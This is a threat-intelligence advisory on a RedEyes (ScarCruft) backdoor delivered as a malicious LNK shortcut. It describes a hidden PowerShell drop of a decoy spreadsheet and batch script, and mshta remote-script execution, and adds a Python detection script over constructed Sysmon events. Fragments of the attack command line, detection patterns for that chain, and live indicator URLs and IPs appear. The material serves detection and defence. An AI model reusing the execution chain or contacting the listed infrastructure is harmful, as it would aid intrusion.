Distribution of Backdoor via Malicious LNK: RedEyes (ScarCruft)
AhnLab Security Emergency response Center (ASEC) has confirmed that malware [1], which was previously distributed in CHM format, is now being distributed in LNK format. This malware executes additional scripts located at a specific URL through the mshta process. It then receives commands from the threat actor’s server to carry out additional malicious behaviors.
The threat actor has been distributing the confirmed LNK file on a regular website by uploading it alongside malware within a compressed file.
The malicious LNK file has been uploaded under the file name ‘REPORT.ZIP’. As with the malware identified in <RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)> [2], the archive contains an LNK file that embeds both normal Excel document data and malicious script code.
When the ‘Status Survey Table.xlsx.lnk’ file is executed, its PowerShell commands write a normal document, ‘Status Survey Table.xlsx’, and the malicious script ‘PMmVvG56FLC9y.bat’ into the %Temp% folder and then execute them, so the victim sees an ordinary spreadsheet open while the script runs.
/c powershell …
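The execution chain above (explorer launching the shortcut, cmd.exe handing off to a hidden PowerShell, a decoy document and a script written to %Temp%, and mshta.exe fetching a script from a URL) can be spotted from endpoint telemetry. The following is an added detection example, not code from ASEC or from the campaign: it runs three rules over constructed Sysmon-style events (EventID 1 process creation, EventID 11 file creation). The event shapes, process GUIDs, the `C:\Users\user\...` paths and the `EXAMPLE-PLACEHOLDER.invalid` URL are all constructed for illustration; only the two dropped file names come from the post.

```python
"""Detection rules for the LNK -> cmd.exe -> hidden PowerShell -> %Temp% drop -> mshta chain.

Added example. Events below are constructed in a Sysmon-like shape and are
not real telemetry from the RedEyes campaign.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List

TEMP_RE = re.compile(r"\\(?:Temp|Tmp)\\", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)
SCRIPT_EXT = {".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta"}
DECOY_EXT = {".xlsx", ".xls", ".docx", ".doc", ".pdf", ".hwp", ".pptx"}


def _basename(path: str) -> str:
    """Lower-cased final path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ext(path: str) -> str:
    """Extension of the final path component, including the dot ('' if none)."""
    name = _basename(path)
    return name[name.rfind("."):] if "." in name else ""


def detect(events: Iterable[Dict]) -> List[Dict]:
    """Return one finding per rule hit; rules 1 and 2 fire per event, rule 3 per process."""
    findings: List[Dict] = []
    temp_writes: Dict[str, List[str]] = defaultdict(list)

    for ev in events:
        image = _basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        if ev.get("EventID") == 1:
            parent = _basename(ev.get("ParentImage", ""))
            # Rule 1: a shortcut opened from Explorer spawns cmd.exe that immediately
            # invokes PowerShell. This is the "/c powershell ..." launch in the post.
            if image == "cmd.exe" and parent == "explorer.exe" and "powershell" in cmd.lower():
                findings.append({"rule": "lnk_cmd_powershell",
                                 "ProcessGuid": ev.get("ProcessGuid"), "CommandLine": cmd})
            # Rule 2: mshta.exe given a URL on its command line (remote script execution).
            if image == "mshta.exe" and URL_RE.search(cmd):
                findings.append({"rule": "mshta_remote_script",
                                 "ProcessGuid": ev.get("ProcessGuid"), "CommandLine": cmd})
        elif ev.get("EventID") == 11 and image == "powershell.exe":
            target = ev.get("TargetFilename", "")
            if TEMP_RE.search(target):
                temp_writes[ev.get("ProcessGuid", "")].append(target)

    # Rule 3: one PowerShell process writes both a decoy document and a script into %Temp%.
    # Either file alone is common; the pair from a single process is the LNK drop pattern.
    for guid, targets in temp_writes.items():
        exts = {_ext(t) for t in targets}
        if exts & SCRIPT_EXT and exts & DECOY_EXT:
            findings.append({"rule": "temp_decoy_and_script",
                             "ProcessGuid": guid, "Files": sorted(targets)})
    return findings


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
TEMP = "C:\\Users\\user\\AppData\\Local\\Temp\\"

# Constructed sample events (GUIDs, paths and URL are placeholders, payload text omitted).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{P1}", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": '"C:\\Windows\\System32\\cmd.exe" /c powershell -WindowStyle hidden -Command "<omitted>"'},
    {"EventID": 1, "ProcessGuid": "{P2}", "Image": PS,
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": 'powershell -WindowStyle hidden -Command "<omitted>"'},
    {"EventID": 11, "ProcessGuid": "{P2}", "Image": PS,
     "TargetFilename": TEMP + "Status Survey Table.xlsx"},
    {"EventID": 11, "ProcessGuid": "{P2}", "Image": PS,
     "TargetFilename": TEMP + "PMmVvG56FLC9y.bat"},
    {"EventID": 1, "ProcessGuid": "{P3}", "Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "mshta.exe http://EXAMPLE-PLACEHOLDER.invalid/stage2"},
    # Benign noise: Excel writing its own temp file, and an interactive cmd.exe from Explorer.
    {"EventID": 11, "ProcessGuid": "{P4}",
     "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
     "TargetFilename": TEMP + "~$budget.xlsx"},
    {"EventID": 1, "ProcessGuid": "{P5}", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": '"C:\\Windows\\System32\\cmd.exe"'},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["rule"], f["ProcessGuid"])
```

Rule 3 keys on the process that performs both writes rather than on file names, so it still fires if the threat actor renames the decoy or the script; rules 1 and 2 are the cheap first-pass signals and will need tuning against legitimate shortcuts and HTA applications in a given environment.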
IoC
0eb8db3cbde470407f942fd63afe42b8
27f74072d6268b5d96d73107c560d852
2d444b6f72c8327d1d155faa2cca7fd7
75.119.136.207
http://75.119.136.207/config/bases/config.php
http://bian0151.cafe24.com/admin/board/1.html